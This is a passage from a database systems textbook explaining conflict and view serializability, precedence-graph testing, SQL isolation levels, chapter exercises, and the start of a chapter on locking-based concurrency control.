T2 reads the value of X written by T1, while the other read_item operations read the database values from the initial database state. Additionally, T1 is the last transaction to write Y, and T2 is the last transaction to write X in both schedules. Because A is a serial schedule and schedule D is equivalent to A, D is a serializable schedule. Notice that the operations r1(Y) and w1(Y) of schedule D do not conflict with the operations r2(X) and w2(X), since they access different data items. Therefore, we can move r1(Y), w1(Y) before r2(X), w2(X), leading to the equivalent serial schedule T1, T2. Schedule C in Figure 5(c) is not equivalent to either of the two possible serial sched- ules A and B, and hence is not serializable. Trying to reorder the operations of sched- ule C to find an equivalent serial schedule fails because r2(X) and w1(X) conflict, which means that we cannot move r2(X) down to get the equivalent serial schedule T1, T2. Similarly, because w1(X) and w2(X) conflict, we cannot move w1(X) down to get the equivalent serial schedule T2, T1. Another, more complex definition of equivalence—called view equivalence, which leads to the concept of view serializability—is discussed in Section 5.4. 5.2 Testing for Conflict Serializability of a Schedule There is a simple algorithm for determining whether a particular schedule is con- flict serializable or not. Most concurrency control methods do not actually test for serializability. Rather protocols, or rules, are developed that guarantee that any schedule that follows these rules will be serializable. We discuss the algorithm for testing conflict serializability of schedules here to gain a better understanding of these concurrency control protocols. Algorithm 1 can be used to test a schedule for conflict serializability. The algorithm looks at only the read_item and write_item operations in a schedule to construct a precedence graph (or serialization graph), which is a directed graph G = (N, E) that consists of a set of nodes N = {T1, T2, ..., Tn } and a set of directed edges E = {e1, e2, ..., em }. There is one node in the graph for each transaction Ti in the schedule. Each edge ei in the graph is of the form (Tj → Tk ), 1 ≤ j ≤ n, 1 ≤ k ≤ n, where Tj is the starting node of ei and Tk is the ending node of ei. Such an edge from node Tj to 10We will use serializable to mean conflict serializable. Another definition of serializable used in practice (see Section 6) is to have repeatable reads, no dirty reads, and no phantom records. 767 Introduction to Transaction Processing Concepts and Theory node Tk is created by the algorithm if one of the operations in Tj appears in the schedule before some conflicting operation in Tk. Algorithm 1. Testing Conflict Serializability of a Schedule S 1. For each transaction Ti participating in schedule S, create a node labeled Ti in the precedence graph. 2. For each case in S where Tj executes a read_item(X) after Ti executes a write_item(X), create an edge (Ti → Tj) in the precedence graph. 3. For each case in S where Tj executes a write_item(X) after Ti executes a read_item(X), create an edge (Ti → Tj) in the precedence graph. 4. For each case in S where Tj executes a write_item(X) after Ti executes a write_item(X), create an edge (Ti → Tj) in the precedence graph. 5. The schedule S is serializable if and only if the precedence graph has no cycles. The precedence graph is constructed as described in Algorithm 1. If there is a cycle in the precedence graph, schedule S is not (conflict) serializable; if there is no cycle, S is serializable. A cycle in a directed graph is a sequence of edges C = ((Tj → Tk), (Tk → Tp), ..., (Ti → Tj)) with the property that the starting node of each edge— except the first edge—is the same as the ending node of the previous edge, and the starting node of the first edge is the same as the ending node of the last edge (the sequence starts and ends at the same node). In the precedence graph, an edge from Ti to Tj means that transaction Ti must come before transaction Tj in any serial schedule that is equivalent to S, because two con- flicting operations appear in the schedule in that order. If there is no cycle in the precedence graph, we can create an equivalent serial schedule S� that is equivalent to S, by ordering the transactions that participate in S as follows: Whenever an edge exists in the precedence graph from Ti to Tj, Ti must appear before Tj in the equiva- lent serial schedule S�.11 Notice that the edges (Ti → Tj) in a precedence graph can optionally be labeled by the name(s) of the data item(s) that led to creating the edge. Figure 7 shows such labels on the edges. In general, several serial schedules can be equivalent to S if the precedence graph for S has no cycle. However, if the precedence graph has a cycle, it is easy to show that we cannot create any equivalent serial schedule, so S is not serializable. The prece- dence graphs created for schedules A to D, respectively, in Figure 5 appear in Figure 7(a) to (d). The graph for schedule C has a cycle, so it is not serializable. The graph for schedule D has no cycle, so it is serializable, and the equivalent serial schedule is T1 followed by T2. The graphs for schedules A and B have no cycles, as expected, because the schedules are serial and hence serializable. Another example, in which three transactions participate, is shown in Figure 8. Figure 8(a) shows the read_item and write_item operations in each transaction. Two schedules E and F for these transactions are shown in Figure 8(b) and (c), respec- 11This process of ordering the nodes of an acrylic graph is known as topological sorting. 768 Introduction to Transaction Processing Concepts and Theory T1(a) (c) (b) (d) T2 T1 X X X X T2 T1 T2 T1 T2 X Figure 7 Constructing the precedence graphs for schedules A to D from Figure 5 to test for conflict serializability. (a) Precedence graph for serial schedule A. (b) Precedence graph for serial schedule B. (c) Precedence graph for schedule C (not serializable). (d) Precedence graph for schedule D (serializable, equivalent to schedule A). tively, and the precedence graphs for schedules E and F are shown in parts (d) and (e). Schedule E is not serializable because the corresponding precedence graph has cycles. Schedule F is serializable, and the serial schedule equivalent to F is shown in Figure 8(e). Although only one equivalent serial schedule exists for F, in general there may be more than one equivalent serial schedule for a serializable schedule. Figure 8(f) shows a precedence graph representing a schedule that has two equiva- lent serial schedules. To find an equivalent serial schedule, start with a node that does not have any incoming edges, and then make sure that the node order for every edge is not violated. 5.3 How Serializability Is Used for Concurrency Control As we discussed earlier, saying that a schedule S is (conflict) serializable—that is, S is (conflict) equivalent to a serial schedule—is tantamount to saying that S is correct. Being serializable is distinct from being serial, however. A serial schedule represents inefficient processing because no interleaving of operations from different transac- tions is permitted. This can lead to low CPU utilization while a transaction waits for disk I/O, or for another transaction to terminate, thus slowing down processing considerably. A serializable schedule gives the benefits of concurrent execution without giving up any correctness. In practice, it is quite difficult to test for the seri- alizability of a schedule. The interleaving of operations from concurrent transac- tions—which are usually executed as processes by the operating system—is typically determined by the operating system scheduler, which allocates resources to 769 Introduction to Transaction Processing Concepts and Theory Transaction T1 read_item(X ); write_item(X ); read_item(Y ); write_item(Y ); read_item(X ); write_item(X ); read_item(Y ); write_item(Y ); Transaction T3 read_item(Y ); read_item(Z ); write_item(Y ); write_item(Z ); read_item(Y ); read_item(Z ); write_item(Y); write_item(Z ); Transaction T2 read_item(Z ); read_item(Y ); write_item(Y ); read_item(X ); write_item(X ); read_item(Z ); read_item(Y ); write_item(Y ); read_item(X ); write_item(X ); (b) (a) Schedule E Time read_item(X ); write_item(X ); read_item(Y ); write_item(Y ); read_item(Y ); read_item(Z ); write_item(Y ); write_item(Z ); read_item(Z ); read_item(Y ); write_item(Y ); read_item(X ); write_item(X ); (c) Schedule F Time Transaction T1 Transaction T2 Transaction T3 Transaction T1 Transaction T2 Transaction T3 Figure 8 Another example of serializability testing. (a) The read and write operations of three transactions T1, T2, and T3. (b) Schedule E. (c) Schedule F. all processes. Factors such as system load, time of transaction submission, and pri- orities of processes contribute to the ordering of operations in a schedule. Hence, it is difficult to determine how the operations of a schedule will be interleaved before- hand to ensure serializability. 770 Introduction to Transaction Processing Concepts and Theory (d) X Y Y Y, Z T1 Equivalent serial schedules None Reason Cycle X(T1 T2),Y(T2 T1) Cycle X(T1 T2),YZ (T2 T3),Y(T3 T1) (e) X,Y Y Y, Z Equivalent serial schedules (f) Equivalent serial schedules T2 T3 T1 T2 T3 T1 T2 T3 T2T3 T1 T2T3 T1 T1T3 T2 If transactions are executed at will and then the resulting schedule is tested for seri- alizability, we must cancel the effect of the schedule if it turns out not to be serializ- able. This is a serious problem that makes this approach impractical. Hence, the approach taken in most practical systems is to determine methods or protocols that ensure serializability, without having to test the schedules themselves. The approach taken in most commercial DBMSs is to design protocols (sets of rules) that—if fol- lowed by every individual transaction or if enforced by a DBMS concurrency con- trol subsystem—will ensure serializability of all schedules in which the transactions participate. Another problem appears here: When transactions are submitted continuously to the system, it is difficult to determine when a schedule begins and when it ends. Serializability theory can be adapted to deal with this problem by considering only the committed projection of a schedule S. Recall from Section 4.1 that the committed projection C(S) of a schedule S includes only the operations in S that belong to committed transactions. We can theoretically define a schedule S to be serializable if its committed projection C(S) is equivalent to some serial schedule, since only committed transactions are guaranteed by the DBMS. Figure 8 (continued) Another example of serializability testing. (d) Precedence graph for schedule E. (e) Precedence graph for schedule F. (f) Precedence graph with two equivalent serial schedules. 771 Introduction to Transaction Processing Concepts and Theory A number of different concurrency control protocols guarantee serializability. The most common technique, called two-phase locking, is based on locking data items to prevent concurrent transactions from interfering with one another, and enforcing an additional condition that guarantees serializability. This is used in the majority of commercial DBMSs. Other protocols have been proposed;12 these include timestamp ordering, where each transaction is assigned a unique timestamp and the protocol ensures that any conflicting operations are executed in the order of the transaction timestamps; multiversion protocols, which are based on maintaining multiple versions of data items; and optimistic (also called certification or validation) protocols, which check for possible serializability violations after the transactions terminate but before they are permitted to commit. 5.4 View Equivalence and View Serializability In Section 5.1 we defined the concepts of conflict equivalence of schedules and con- flict serializability. Another less restrictive definition of equivalence of schedules is called view equivalence. This leads to another definition of serializability called view serializability. Two schedules S and S� are said to be view equivalent if the following three conditions hold: 1. The same set of transactions participates in S and S�, and S and S� include the same operations of those transactions. 2. For any operation ri(X) of Ti in S, if the value of X read by the operation has been written by an operation wj(X) of Tj (or if it is the original value of X before the schedule started), the same condition must hold for the value of X read by operation ri(X) of Ti in S�. 3. If the operation wk(Y) of Tk is the last operation to write item Y in S, then wk(Y) of Tk must also be the last operation to write item Y in S�. The idea behind view equivalence is that, as long as each read operation of a trans- action reads the result of the same write operation in both schedules, the write operations of each transaction must produce the same results. The read operations are hence said to see the same view in both schedules. Condition 3 ensures that the final write operation on each data item is the same in both schedules, so the data- base state should be the same at the end of both schedules. A schedule S is said to be view serializable if it is view equivalent to a serial schedule. The definitions of conflict serializability and view serializability are similar if a con- dition known as the constrained write assumption (or no blind writes) holds on all transactions in the schedule. This condition states that any write operation wi(X) in Ti is preceded by a ri(X) in Ti and that the value written by wi(X) in Ti depends only on the value of X read by ri(X). This assumes that computation of the new value of X is a function f(X) based on the old value of X read from the database. A blind write is a write operation in a transaction T on an item X that is not depen- dent on the value of X, so it is not preceded by a read of X in the transaction T. 12These other protocols have not been incorporated much into commercial systems; most relational DBMSs use some variation of the two-phase locking protocol. 772 Introduction to Transaction Processing Concepts and Theory The definition of view serializability is less restrictive than that of conflict serializ- ability under the unconstrained write assumption, where the value written by an operation wi(X) in Ti can be independent of its old value from the database. This is possible when blind writes are allowed, and it is illustrated by the following schedule Sg of three transactions T1: r1(X); w1(X); T2: w2(X); and T3: w3(X): Sg: r1(X); w2(X); w1(X); w3(X); c1; c2; c3; In Sg the operations w2(X) and w3(X) are blind writes, since T2 and T3 do not read the value of X. The schedule Sg is view serializable, since it is view equivalent to the serial schedule T1, T2, T3. However, Sg is not conflict serializable, since it is not conflict equivalent to any serial schedule. It has been shown that any conflict- serializable schedule is also view serializable but not vice versa, as illustrated by the preceding example. There is an algorithm to test whether a schedule S is view serial- izable or not. However, the problem of testing for view serializability has been shown to be NP-hard, meaning that finding an efficient polynomial time algorithm for this problem is highly unlikely. 5.5 Other Types of Equivalence of Schedules Serializability of schedules is sometimes considered to be too restrictive as a condi- tion for ensuring the correctness of concurrent executions. Some applications can produce schedules that are correct by satisfying conditions less stringent than either conflict serializability or view serializability. An example is the type of transactions known as debit-credit transactions—for example, those that apply deposits and withdrawals to a data item whose value is the current balance of a bank account. The semantics of debit-credit operations is that they update the value of a data item X by either subtracting from or adding to the value of the data item. Because addi- tion and subtraction operations are commutative—that is, they can be applied in any order—it is possible to produce correct schedules that are not serializable. For example, consider the following transactions, each of which may be used to transfer an amount of money between two bank accounts: T1: r1(X); X := X − 10; w1(X); r1(Y); Y := Y + 10; w1(Y); T2: r2(Y); Y := Y − 20; w2(Y); r2(X); X := X + 20; w2(X); Consider the following nonserializable schedule Sh for the two transactions: Sh: r1(X); w1(X); r2(Y); w2(Y); r1(Y); w1(Y); r2(X); w2(X); With the additional knowledge, or semantics, that the operations between each ri(I) and wi(I) are commutative, we know that the order of executing the sequences con- sisting of (read, update, write) is not important as long as each (read, update, write) sequence by a particular transaction Ti on a particular item I is not interrupted by conflicting operations. Hence, the schedule Sh is considered to be correct even though it is not serializable. Researchers have been working on extending concur- rency control theory to deal with cases where serializability is considered to be too restrictive as a condition for correctness of schedules. Also, in certain domains of applications such as computer aided design (CAD) of complex systems like aircraft, 773 Introduction to Transaction Processing Concepts and Theory design transactions last over a long time period. In such applications, more relaxed schemes of concurrency control have been proposed to maintain consistency of the database. 6 Transaction Support in SQL In this section, we give a brief introduction to transaction support in SQL. There are many more details, and the newer standards have more commands for transaction processing. The basic definition of an SQL transaction is similar to our already defined concept of a transaction. That is, it is a logical unit of work and is guaran- teed to be atomic. A single SQL statement is always considered to be atomic—either it completes execution without an error or it fails and leaves the database unchanged. With SQL, there is no explicit Begin_Transaction statement. Transaction initiation is done implicitly when particular SQL statements are encountered. However, every transaction must have an explicit end statement, which is either a COMMIT or a ROLLBACK. Every transaction has certain characteristics attributed to it. These characteristics are specified by a SET TRANSACTION statement in SQL. The charac- teristics are the access mode, the diagnostic area size, and the isolation level. The access mode can be specified as READ ONLY or READ WRITE. The default is READ WRITE, unless the isolation level of READ UNCOMMITTED is specified (see below), in which case READ ONLY is assumed. A mode of READ WRITE allows select, update, insert, delete, and create commands to be executed. A mode of READ ONLY, as the name implies, is simply for data retrieval. The diagnostic area size option, DIAGNOSTIC SIZE n, specifies an integer value n, which indicates the number of conditions that can be held simultaneously in the diagnostic area. These conditions supply feedback information (errors or excep- tions) to the user or program on the n most recently executed SQL statement. The isolation level option is specified using the statement ISOLATION LEVEL , where the value for can be READ UNCOMMITTED, READ
COMMITTED, REPEATABLE READ, or SERIALIZABLE.13 The default isolation level is
SERIALIZABLE, although some systems use READ COMMITTED as their default. The
use of the term SERIALIZABLE here is based on not allowing violations that cause
dirty read, unrepeatable read, and phantoms,14 and it is thus not identical to the way
serializability was defined earlier in Section 5. If a transaction executes at a lower
isolation level than SERIALIZABLE, then one or more of the following three viola-
tions may occur:

1. Dirty read. A transaction T1 may read the update of a transaction T2, which
has not yet committed. If T2 fails and is aborted, then T1 would have read a
value that does not exist and is incorrect.

13These are similar to the isolation levels discussed briefly at the end of Section 3.
14The dirty read and unrepeatable read problems were discussed in Section 1.3.

774

Introduction to Transaction Processing Concepts and Theory

Table 1 Possible Violations Based on Isolation Levels as Defined in SQL

Type of Violation

Isolation Level Dirty Read Nonrepeatable Read Phantom

READ UNCOMMITTED Yes Yes Yes
READ COMMITTED No Yes Yes
REPEATABLE READ No No Yes
SERIALIZABLE No No No

2. Nonrepeatable read. A transaction T1 may read a given value from a table. If
another transaction T2 later updates that value and T1 reads that value again,
T1 will see a different value.

3. Phantoms. A transaction T1 may read a set of rows from a table, perhaps
based on some condition specified in the SQL WHERE-clause. Now suppose
that a transaction T2 inserts a new row that also satisfies the WHERE-clause
condition used in T1, into the table used by T1. If T1 is repeated, then T1 will
see a phantom, a row that previously did not exist.

Table 1 summarizes the possible violations for the different isolation levels. An entry
of Yes indicates that a violation is possible and an entry of No indicates that it is not
possible. READ UNCOMMITTED is the most forgiving, and SERIALIZABLE is the
most restrictive in that it avoids all three of the problems mentioned above.

A sample SQL transaction might look like the following:

EXEC SQL WHENEVER SQLERROR GOTO UNDO;
EXEC SQL SET TRANSACTION

READ WRITE
DIAGNOSTIC SIZE 5
ISOLATION LEVEL SERIALIZABLE;

EXEC SQL INSERT INTO EMPLOYEE (Fname, Lname, Ssn, Dno, Salary)
VALUES (‘Robert’, ‘Smith’, ‘991004321’, 2, 35000);

EXEC SQL UPDATE EMPLOYEE
SET Salary = Salary * 1.1 WHERE Dno = 2;

EXEC SQL COMMIT;
GOTO THE_END;
UNDO: EXEC SQL ROLLBACK;
THE_END: … ;

The above transaction consists of first inserting a new row in the EMPLOYEE table
and then updating the salary of all employees who work in department 2. If an error
occurs on any of the SQL statements, the entire transaction is rolled back. This
implies that any updated salary (by this transaction) would be restored to its previ-
ous value and that the newly inserted row would be removed.

As we have seen, SQL provides a number of transaction-oriented features. The DBA
or database programmers can take advantage of these options to try improving

775

Introduction to Transaction Processing Concepts and Theory

transaction performance by relaxing serializability if that is acceptable for their
applications.

7 Summary
In this chapter we discussed DBMS concepts for transaction processing. We intro-
duced the concept of a database transaction and the operations relevant to transac-
tion processing. We compared single-user systems to multiuser systems and then
presented examples of how uncontrolled execution of concurrent transactions in a
multiuser system can lead to incorrect results and database values. We also discussed
the various types of failures that may occur during transaction execution.

Next we introduced the typical states that a transaction passes through during execu-
tion, and discussed several concepts that are used in recovery and concurrency con-
trol methods. The system log keeps track of database accesses, and the system uses
this information to recover from failures. A transaction either succeeds and reaches
its commit point or it fails and has to be rolled back. A committed transaction has its
changes permanently recorded in the database. We presented an overview of the
desirable properties of transactions—atomicity, consistency preservation, isolation,
and durability—which are often referred to as the ACID properties.

Then we defined a schedule (or history) as an execution sequence of the operations
of several transactions with possible interleaving. We characterized schedules in
terms of their recoverability. Recoverable schedules ensure that, once a transaction
commits, it never needs to be undone. Cascadeless schedules add an additional con-
dition to ensure that no aborted transaction requires the cascading abort of other
transactions. Strict schedules provide an even stronger condition that allows a sim-
ple recovery scheme consisting of restoring the old values of items that have been
changed by an aborted transaction.

We defined equivalence of schedules and saw that a serializable schedule is equiva-
lent to some serial schedule. We defined the concepts of conflict equivalence and
view equivalence, which led to definitions for conflict serializability and view serial-
izability. A serializable schedule is considered correct. We presented an algorithm
for testing the (conflict) serializability of a schedule. We discussed why testing for
serializability is impractical in a real system, although it can be used to define and
verify concurrency control protocols, and we briefly mentioned less restrictive defi-
nitions of schedule equivalence. Finally, we gave a brief overview of how transaction
concepts are used in practice within SQL.

Review Questions
1. What is meant by the concurrent execution of database transactions in a

multiuser system? Discuss why concurrency control is needed, and give
informal examples.

776

Introduction to Transaction Processing Concepts and Theory

2. Discuss the different types of failures. What is meant by catastrophic failure?

3. Discuss the actions taken by the read_item and write_item operations on a
database.

4. Draw a state diagram and discuss the typical states that a transaction goes
through during execution.

5. What is the system log used for? What are the typical kinds of records in a
system log? What are transaction commit points, and why are they impor-
tant?

6. Discuss the atomicity, durability, isolation, and consistency preservation
properties of a database transaction.

7. What is a schedule (history)? Define the concepts of recoverable, cascadeless,
and strict schedules, and compare them in terms of their recoverability.

8. Discuss the different measures of transaction equivalence. What is the differ-
ence between conflict equivalence and view equivalence?

9. What is a serial schedule? What is a serializable schedule? Why is a serial
schedule considered correct? Why is a serializable schedule considered cor-
rect?

10. What is the difference between the constrained write and the unconstrained
write assumptions? Which is more realistic?

11. Discuss how serializability is used to enforce concurrency control in a data-
base system. Why is serializability sometimes considered too restrictive as a
measure of correctness for schedules?

12. Describe the four levels of isolation in SQL.

13. Define the violations caused by each of the following: dirty read, nonrepeat-
able read, and phantoms.

Exercises
14. Change transaction T2 in Figure 2(b) to read

read_item(X);
X := X + M;
if X > 90 then exit
else write_item(X);

Discuss the final result of the different schedules in Figure 3(a) and (b),
where M = 2 and N = 2, with respect to the following questions: Does adding
the above condition change the final outcome? Does the outcome obey the
implied consistency rule (that the capacity of X is 90)?

15. Repeat Exercise 14, adding a check in T1 so that Y does not exceed 90.

777

Introduction to Transaction Processing Concepts and Theory

16. Add the operation commit at the end of each of the transactions T1 and T2 in
Figure 2, and then list all possible schedules for the modified transactions.
Determine which of the schedules are recoverable, which are cascadeless,
and which are strict.

17. List all possible schedules for transactions T1 and T2 in Figure 2, and deter-
mine which are conflict serializable (correct) and which are not.

18. How many serial schedules exist for the three transactions in Figure 8(a)?
What are they? What is the total number of possible schedules?

19. Write a program to create all possible schedules for the three transactions in
Figure 8(a), and to determine which of those schedules are conflict serializ-
able and which are not. For each conflict-serializable schedule, your program
should print the schedule and list all equivalent serial schedules.

20. Why is an explicit transaction end statement needed in SQL but not an
explicit begin statement?

21. Describe situations where each of the different isolation levels would be use-
ful for transaction processing.

22. Which of the following schedules is (conflict) serializable? For each serializ-
able schedule, determine the equivalent serial schedules.

a. r1(X); r3(X); w1(X); r2(X); w3(X);

b. r1(X); r3(X); w3(X); w1(X); r2(X);

c. r3(X); r2(X); w3(X); r1(X); w1(X);

d. r3(X); r2(X); r1(X); w3(X); w1(X);

23. Consider the three transactions T1, T2, and T3, and the schedules S1 and S2
given below. Draw the serializability (precedence) graphs for S1 and S2, and
state whether each schedule is serializable or not. If a schedule is serializable,
write down the equivalent serial schedule(s).

T1: r1 (X); r1 (Z); w1 (X);
T2: r2 (Z); r2 (Y); w2 (Z); w2 (Y);
T3: r3 (X); r3 (Y); w3 (Y);
S1: r1 (X); r2 (Z); r1 (Z); r3 (X); r3 (Y); w1 (X); w3 (Y); r2 (Y); w2 (Z); w2 (Y);
S2: r1 (X); r2 (Z); r3 (X); r1 (Z); r2 (Y); r3 (Y); w1 (X); w2 (Z); w3 (Y); w2 (Y);

24. Consider schedules S3, S4, and S5 below. Determine whether each schedule is
strict, cascadeless, recoverable, or nonrecoverable. (Determine the strictest
recoverability condition that each schedule satisfies.)

S3: r1 (X); r2 (Z); r1 (Z); r3 (X); r3 (Y); w1 (X); c1; w3 (Y); c3; r2 (Y); w2 (Z);
w2 (Y); c2;

S4: r1 (X); r2 (Z); r1 (Z); r3 (X); r3 (Y); w1 (X); w3 (Y); r2 (Y); w2 (Z); w2 (Y); c1;
c2; c3;

S5: r1 (X); r2 (Z); r3 (X); r1 (Z); r2 (Y); r3 (Y); w1 (X); c1; w2 (Z); w3 (Y); w2 (Y);
c3; c2;

778

Selected Bibliography
The concept of serializability and related ideas to maintain consistency in a database
were introduced in Gray et al. (1975). The concept of the database transaction was
first discussed in Gray (1981). Gray won the coveted ACM Turing Award in 1998 for
his work on database transactions and implementation of transactions in relational
DBMSs. Bernstein, Hadzilacos, and Goodman (1988) focus on concurrency control
and recovery techniques in both centralized and distributed database systems; it is
an excellent reference. Papadimitriou (1986) offers a more theoretical perspective. A
large reference book of more than a thousand pages by Gray and Reuter (1993)
offers a more practical perspective of transaction processing concepts and tech-
niques. Elmagarmid (1992) offers collections of research papers on transaction pro-
cessing for advanced applications. Transaction support in SQL is described in Date
and Darwen (1997). View serializability is defined in Yannakakis (1984).
Recoverability of schedules and reliability in databases is discussed in Hadzilacos
(1983, 1988).

Introduction to Transaction Processing Concepts and Theory

779

Concurrency Control
Techniques

In this chapter we discuss a number of concurrencycontrol techniques that are used to ensure the nonin-
terference or isolation property of concurrently executing transactions. Most of
these techniques ensure serializability of schedules—using concurrency control
protocols (sets of rules) that guarantee serializability. One important set of proto-
cols—known as two-phase locking protocols—employ the technique of locking data
items to prevent multiple transactions from accessing the items concurrently; a
number of locking protocols are described in Sections 1 and 3.2. Locking protocols
are used in most commercial DBMSs. Another set of concurrency control protocols
use timestamps. A timestamp is a unique identifier for each transaction, generated
by the system. Timestamps values are generated in the same order as the transaction
start times. Concurrency control protocols that use timestamp ordering to ensure
serializability are introduced in Section 2. In Section 3 we discuss multiversion con-
currency control protocols that use multiple versions of a data item. One multiver-
sion protocol extends timestamp order to multiversion timestamp ordering
(Section 3.1), and another extends two-phase locking (Section 3.2). In Section 4 we
present a protocol based on the concept of validation or certification of a transac-
tion after it executes its operations; these are sometimes called optimistic
protocols, and also assume that multiple versions of a data item can exist.

Another factor that affects concurrency control is the granularity of the data
items—that is, what portion of the database a data item represents. An item can be
as small as a single attribute (field) value or as large as a disk block, or even a whole
file or the entire database. We discuss granularity of items and a multiple granular-
ity concurrency control protocol, which is an extension of two-phase locking, in
Section 5. In Section 6 we describe concurrency control issues that arise when

From Chapter 22 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

780

Concurrency Control Techniques

indexes are used to process transactions, and in Section 7 we discuss some addi-
tional concurrency control concepts. Section 8 summarizes the chapter.

It is sufficient to read Sections 1, 5, 6, and 7, and possibly 3.2, if your main interest is
an introduction to the concurrency control techniques that are based on locking,
which are used most often in practice. The other techniques are mainly of theoreti-
cal interest.

1 Two-Phase Locking Techniques
for Concurrency Control

Some of the main techniques used to control concurrent execution of transactions
are based on the concept of locking data items. A lock is a variable associated with a
data item that describes the status of the item with respect to possible operations
that can be applied to it. Generally, there is one lock for each data item in the data-
base. Locks are used as a means of synchronizing the access by concurrent transac-
tions to the database items. In Section 1.1 we discuss the nature and types of locks.
Then, in Section 1.2 we present protocols that use locking to guarantee serializabil-
ity of transaction schedules. Finally, in Section 1.3 we describe two problems associ-
ated with the use of locks—deadlock and starvation—and show how these
problems are handled in concurrency control protocols.

1.1 Types of Locks and System Lock Tables
Several types of locks are used in concurrency control. To introduce locking con-
cepts gradually, first we discuss binary locks, which are simple, but are also too
restrictive for database concurrency control purposes, and so are not used in practice.
Then we discuss shared/exclusive locks—also known as read/write locks—which
provide more general locking capabilities and are used in practical database locking
schemes. In Section 3.2 we describe an additional type of lock called a certify lock,
and show how it can be used to improve performance of locking protocols.

Binary Locks. A binary lock can have two states or values: locked and unlocked (or
1 and 0, for simplicity). A distinct lock is associated with each database item X. If the
value of the lock on X is 1, item X cannot be accessed by a database operation that
requests the item. If the value of the lock on X is 0, the item can be accessed when
requested, and the lock value is changed to 1. We refer to the current value (or state)
of the lock associated with item X as lock(X).

Two operations, lock_item and unlock_item, are used with binary locking. A transaction
requests access to an item X by first issuing a lock_item(X) operation. If LOCK(X) =
1, the transaction is forced to wait. If LOCK(X) = 0, it is set to 1 (the transaction locks
the item) and the transaction is allowed to access item X. When the transaction is
through using the item, it issues an unlock_item(X) operation, which sets LOCK(X)
back to 0 (unlocks the item) so that X may be accessed by other transactions. Hence,
a binary lock enforces mutual exclusion on the data item. A description of the
lock_item(X) and unlock_item(X) operations is shown in Figure 1.

781

Concurrency Control Techniques

lock_item(X):
B: if LOCK(X) = 0 (* item is unlocked *)

then LOCK(X) ←1 (* lock the item *)
else

begin
wait (until LOCK(X) = 0

and the lock manager wakes up the transaction);
go to B
end;

unlock_item(X):
LOCK(X) ← 0; (* unlock the item *)
if any transactions are waiting

then wakeup one of the waiting transactions;

Figure 1
Lock and unlock oper-
ations for binary locks.

Notice that the lock_item and unlock_item operations must be implemented as indi-
visible units (known as critical sections in operating systems); that is, no interleav-
ing should be allowed once a lock or unlock operation is started until the operation
terminates or the transaction waits. In Figure 1, the wait command within the
lock_item(X) operation is usually implemented by putting the transaction in a wait-
ing queue for item X until X is unlocked and the transaction can be granted access
to it. Other transactions that also want to access X are placed in the same queue.
Hence, the wait command is considered to be outside the lock_item operation.

It is quite simple to implement a binary lock; all that is needed is a binary-valued
variable, LOCK, associated with each data item X in the database. In its simplest
form, each lock can be a record with three fields: plus a queue for transactions that are waiting to access the item.
The system needs to maintain only these records for the items that are currently locked
in a lock table, which could be organized as a hash file on the item name. Items not
in the lock table are considered to be unlocked. The DBMS has a lock manager sub-
system to keep track of and control access to locks.

If the simple binary locking scheme described here is used, every transaction must
obey the following rules:

1. A transaction T must issue the operation lock_item(X) before any
read_item(X) or write_item(X) operations are performed in T.

2. A transaction T must issue the operation unlock_item(X) after all read_item(X)
and write_item(X) operations are completed in T.

3. A transaction T will not issue a lock_item(X) operation if it already holds the
lock on item X.1

4. A transaction T will not issue an unlock_item(X) operation unless it already
holds the lock on item X.

1This rule may be removed if we modify the lock_item (X) operation in Figure 1 so that if the item is cur-
rently locked by the requesting transaction, the lock is granted.

782

Concurrency Control Techniques

These rules can be enforced by the lock manager module of the DBMS. Between the
lock_item(X) and unlock_item(X) operations in transaction T, T is said to hold the
lock on item X. At most one transaction can hold the lock on a particular item.
Thus no two transactions can access the same item concurrently.

Shared/Exclusive (or Read/Write) Locks. The preceding binary locking
scheme is too restrictive for database items because at most, one transaction can
hold a lock on a given item. We should allow several transactions to access the same
item X if they all access X for reading purposes only. This is because read operations
on the same item by different transactions are not conflicting. However, if a transac-
tion is to write an item X, it must have exclusive access to X. For this purpose, a dif-
ferent type of lock called a multiple-mode lock is used. In this scheme—called
shared/exclusive or read/write locks—there are three locking operations:
read_lock(X), write_lock(X), and unlock(X). A lock associated with an item X,
LOCK(X), now has three possible states: read-locked, write-locked, or unlocked. A
read-locked item is also called share-locked because other transactions are allowed
to read the item, whereas a write-locked item is called exclusive-locked because a
single transaction exclusively holds the lock on the item.

One method for implementing the preceding operations on a read/write lock is to
keep track of the number of transactions that hold a shared (read) lock on an item
in the lock table. Each record in the lock table will have four fields: . Again, to save space, the system needs to
maintain lock records only for locked items in the lock table. The value (state) of
LOCK is either read-locked or write-locked, suitably coded (if we assume no records
are kept in the lock table for unlocked items). If LOCK(X)=write-locked, the value of
locking_transaction(s) is a single transaction that holds the exclusive (write) lock
on X. If LOCK(X)=read-locked, the value of locking transaction(s) is a list of one or
more transactions that hold the shared (read) lock on X. The three operations
read_lock(X), write_lock(X), and unlock(X) are described in Figure 2.2 As before, each
of the three locking operations should be considered indivisible; no interleaving
should be allowed once one of the operations is started until either the operation
terminates by granting the lock or the transaction is placed in a waiting queue for
the item.

When we use the shared/exclusive locking scheme, the system must enforce the fol-
lowing rules:

1. A transaction T must issue the operation read_lock(X) or write_lock(X) before
any read_item(X) operation is performed in T.

2. A transaction T must issue the operation write_lock(X) before any
write_item(X) operation is performed in T.

2These algorithms do not allow upgrading or downgrading of locks, as described later in this section. The
reader can extend the algorithms to allow these additional operations.

783

read_lock(X):
B: if LOCK(X) = “unlocked”

then begin LOCK(X) ← “read-locked”;
no_of_reads(X) ← 1
end

else if LOCK(X) = “read-locked”
then no_of_reads(X) ← no_of_reads(X) + 1

else begin
wait (until LOCK(X) = “unlocked”

and the lock manager wakes up the transaction);
go to B
end;

write_lock(X):
B: if LOCK(X) = “unlocked”

then LOCK(X) ← “write-locked”
else begin

wait (until LOCK(X) = “unlocked”
and the lock manager wakes up the transaction);

go to B
end;

unlock (X):
if LOCK(X) = “write-locked”

then begin LOCK(X) ← “unlocked”;
wakeup one of the waiting transactions, if any
end

else it LOCK(X) = “read-locked”
then begin

no_of_reads(X) ← no_of_reads(X) −1;
if no_of_reads(X) = 0

then begin LOCK(X) = “unlocked”;
wakeup one of the waiting transactions, if any
end

end;

Concurrency Control Techniques

Figure 2
Locking and unlocking
operations for two-
mode (read-write or
shared-exclusive)
locks.

3. A transaction T must issue the operation unlock(X) after all read_item(X) and
write_item(X) operations are completed in T.3

